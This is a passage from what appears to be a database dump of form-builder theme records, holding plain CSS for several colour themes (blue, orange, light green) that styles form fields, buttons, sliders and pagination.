url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #0176AA;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #008AFF;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #0073D3 ;\r\n	background: -moz-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0073D3 ), color-stop(39%, #008FE1 ), color-stop(100%, #00A7ED ));\r\n	background: -webkit-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\n	background: -o-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\nbackground: -webkit-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #0176AA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}',0),(22,'Theme 06 orange','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #FAB17A;\r\nmargin-bottom: 10px;\r\ncolor: #FAB17A;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #473C34;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #FFA15C;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #C78655;\r\n}\r\n\r\n.next-page div.wdform-page-button:hover {\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #FAB17A;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.button-submit {\r\ncolor: #473C34;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 35px;\r\nline-height: 35px;\r\nbackground: #FFA15C;\r\npadding: 0px 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder: 1px solid #C78655;\r\n}\r\n.button-submit:hover {\r\n	background: #FAB17A;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #FFA15C ;\r\n	color: #030303;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: \" \" ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"password\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #FFA15C ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #342114;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #C78655;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #342114;\r\n	cursor: pointer;\r\n	background-color: #FF8A34;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #FF8932 ;\r\n	background: -moz-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #F3BA28 ), color-stop(39%, #FFD325 ), color-stop(100%, #FEB824 ));\r\n	background: -o-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\nbackground: -ms-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\nbackground: -webkit-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\n\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\nbackground-color: #ECBE9C;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #473C34;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}',0),(23,'Theme 06 transparent (light green button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #FFFFFF;\r\nborder: 1px solid #90EE90;\r\nmargin-bottom: 10px;\r\ncolor: #90EE90;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	